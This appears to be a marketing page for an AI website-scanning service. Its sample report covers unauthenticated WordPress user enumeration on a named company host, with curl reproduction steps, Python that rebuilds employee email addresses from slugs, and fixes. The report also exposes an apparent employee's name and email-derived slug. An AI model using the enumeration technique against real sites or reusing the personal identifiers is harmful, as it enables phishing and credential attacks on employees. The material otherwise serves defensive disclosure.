Simple as 1-2-3

How Hackator works

Three simple steps to secure your website with AI. Submit, AI analyzes, get your report.

Step 01

Submit your URL

Enter the website URL you want to test. Our AI-powered platform accepts any publicly accessible website — no setup or configuration required. Just paste your URL and hit scan.

No installation needed
Works with any public website
[Dashboard mockup: a scan of https://example.com ("My company website") submitted from hackator.com/dashboard, shown at 100% with the status "Analysis Complete". Sample findings: SSL/TLS certificate valid until 2027-01-15; HTTP security headers: missing X-Frame-Options; XSS scan: reflected XSS in /search?q=; SQL injection tests: no injection points found; CSRF token validation: tokens properly implemented; open ports scan: port 8080 exposed; directory traversal: no traversal paths found; outdated dependencies: jQuery 2.1.4 with known CVEs. Totals: 2 critical, 2 warnings, 4 secure.]
Step 02

AI analyzes your vulnerabilities

Our AI engine and security experts perform a thorough vulnerability assessment. We check for XSS, SQL injection, misconfigurations, outdated dependencies, and more using advanced AI analysis.

OWASP Top 10 coverage
Manual + automated testing
Step 03

Get your security report

Download a detailed AI-generated PDF report with findings, severity levels, proof of concept, and smart remediation guidance. Access it from your dashboard anytime.

Downloadable PDF report
Available on your dashboard
Delivered in less than 24h
Sample report: hackator-report-HKT-2026-0847.pdf (7/7 sections)

Security Assessment Report

Report ID: HKT-2026-0847
Date: March 11, 2026
Severity: MEDIUM 5.7
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary

The WordPress REST API endpoint /wp-json/wp/v2/users on blog.pub.us-west-2.prd.23andme.us returns a list of WordPress users including their IDs, display names, and email-derived slugs without requiring authentication.

Description

The WordPress REST API /wp-json/wp/v2/users endpoint is accessible without authentication on the internal backend. It returns user objects containing user IDs, display names, and URL slugs. The slugs are derived from internal email addresses (e.g., alehman23andme-com → [email protected]), directly exposing employee email addresses.

Steps To Reproduce
1. Send a GET request to the endpoint: curl -s https://blog.pub.../wp-json/wp/v2/users
2. Observe the JSON response containing user data.
3. Extract email addresses from the slug field by reversing the slug encoding.

Proof of Concept
GET /wp-json/wp/v2/users HTTP/1.1
Host: blog.pub.us-west-2.prd.23andme.us

Response: HTTP/1.1 200 OK
[{
  "id": 10,
  "name": "Alisa Lehman",
  "slug": "alehman23andme-com"
}, ...]

Derived email addresses:

Impact

Attackers can enumerate all WordPress user accounts and their IDs, extract internal employee email addresses for phishing campaigns, and use discovered usernames for targeted brute-force or credential stuffing attacks against wp-login.php.
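The reproduction steps and proof of concept above come down to two mechanical pieces: reading the unauthenticated user list, and undoing the slug encoding that WordPress applies to a login. The following Python is an added example written for this page, not Hackator's scanner. Its response body is constructed to mirror the shape of a real /wp-json/wp/v2/users reply, with made-up users and the hypothetical domains example.com and corp.example.org, and the fetch function is injected so the whole thing runs offline (wrap urllib.request.urlopen for a live check). It also adds the check that makes step 3 reliable: a reconstructed address is accepted only if it round-trips through the slug encoding back to the exact slug, which also exposes the ambiguity of hyphens in the local part.

```python
"""
Offline check for the WordPress /wp-json/wp/v2/users exposure described above.

Added example for this page, not Hackator's code. SAMPLE_USERS_JSON is a
constructed reply with hypothetical users and domains; no data from the
report is reproduced here.
"""
import json
import re
from itertools import product
from typing import Callable, Dict, List, Tuple

# Constructed sample reply in the shape WordPress returns (hypothetical data).
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "site-admin"},
    {"id": 10, "name": "Jane Doe", "slug": "jdoeexample-com"},
    {"id": 12, "name": "Sam Roe", "slug": "sam-roecorp-example-org"},
])


def wp_sanitize_title(text: str) -> str:
    """Approximates WordPress sanitize_title_with_dashes() for ASCII input.

    The order is what leaks the address: '.' becomes '-' before characters
    outside [a-z0-9 _-] are deleted, so the login jdoe@example.com turns into
    the slug jdoeexample-com (the '@' vanishes, the '.' survives as '-').
    """
    s = text.lower().replace(".", "-")
    s = re.sub(r"[^a-z0-9 _-]", "", s)
    s = re.sub(r"\s+", "-", s)
    s = re.sub(r"-+", "-", s)
    return s.strip("-")


def _local_part_variants(local: str) -> List[str]:
    """Every '-' in the local part may have been '.' or '-' originally, so
    enumerate both readings (capped so a pathological slug cannot explode)."""
    parts = local.split("-")
    if len(parts) > 7:
        return [local]
    variants = []
    for seps in product("-.", repeat=len(parts) - 1):
        out = parts[0]
        for sep, piece in zip(seps, parts[1:]):
            out += sep + piece
        variants.append(out)
    return sorted(variants)


def candidate_emails(slug: str, domains: List[str]) -> List[str]:
    """Reverse the slug encoding against a list of organisation domains.

    A candidate is kept only if it round-trips through wp_sanitize_title()
    to the exact slug, so a plain display-name slug yields nothing.
    """
    found = []
    for domain in domains:
        suffix = wp_sanitize_title(domain)
        if not slug.endswith(suffix) or len(slug) <= len(suffix):
            continue
        local = slug[: -len(suffix)]
        # Local parts do not start or end with a separator; this rejects
        # mis-splits such as matching example.org inside corp.example.org.
        if not re.fullmatch(r"[a-z0-9_](?:[a-z0-9_-]*[a-z0-9_])?", local):
            continue
        for variant in _local_part_variants(local):
            email = f"{variant}@{domain}"
            if wp_sanitize_title(email) == slug:
                found.append(email)
    return sorted(set(found))


Fetch = Callable[[str], Tuple[int, str]]


def check_user_enumeration(fetch: Fetch, base_url: str, domains: List[str]) -> Dict:
    """Request the users route unauthenticated and report what it leaks.

    `fetch` maps a URL to (status, body); injecting it keeps the example
    offline. WordPress answers errors with a JSON object, not a list.
    """
    url = base_url.rstrip("/") + "/wp-json/wp/v2/users"
    status, body = fetch(url)
    result: Dict = {"url": url, "exposed": False, "users": [], "candidate_emails": {}}
    if status != 200:
        return result
    try:
        users = json.loads(body)
    except ValueError:
        return result
    if not isinstance(users, list):
        return result
    result["exposed"] = len(users) > 0
    for user in users:
        slug = str(user.get("slug", ""))
        result["users"].append((user.get("id"), slug))
        emails = candidate_emails(slug, domains)
        if emails:
            result["candidate_emails"][slug] = emails
    return result


def fake_fetch(url: str) -> Tuple[int, str]:
    """Stand-in for a network client that serves the constructed reply."""
    if url.endswith("/wp-json/wp/v2/users"):
        return 200, SAMPLE_USERS_JSON
    return 404, '{"code":"rest_no_route"}'


if __name__ == "__main__":
    report = check_user_enumeration(fake_fetch, "https://blog.example.com",
                                    ["example.com", "corp.example.org"])
    print(json.dumps(report, indent=2))
```

Two caveats when running this against a live site: WordPress shows unauthenticated callers only the users who have authored published public posts, so an empty list does not prove the route is closed; and the per-user route /wp-json/wp/v2/users/<id> and ?author=N redirects expose the same slugs and should be checked with the same reconstruction logic.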

Recommended Fix

Restrict /wp-json/wp/v2/users and /wp-json/wp/v2/users/<id> to authenticated requests, for example by unsetting those routes in the rest_endpoints filter when no user is logged in, or by returning a WP_Error from the rest_authentication_errors filter for unauthenticated requests to them

Stop using email addresses as WordPress logins and reset the affected user_nicename (slug) values so they no longer encode an address; the slug is public wherever the author archive or the REST API can be reached

Close the other enumeration paths that reveal the same usernames: ?author=N redirects and the /author/<slug>/ archives

Treat the exposed usernames and addresses as known to attackers: rate-limit and require MFA on wp-login.php and xmlrpc.php, and warn the affected employees to expect targeted phishing

Start protecting your website

Ready to find vulnerabilities?

Submit your URL now and get a comprehensive AI-powered security report delivered to your inbox in less than 24 hours.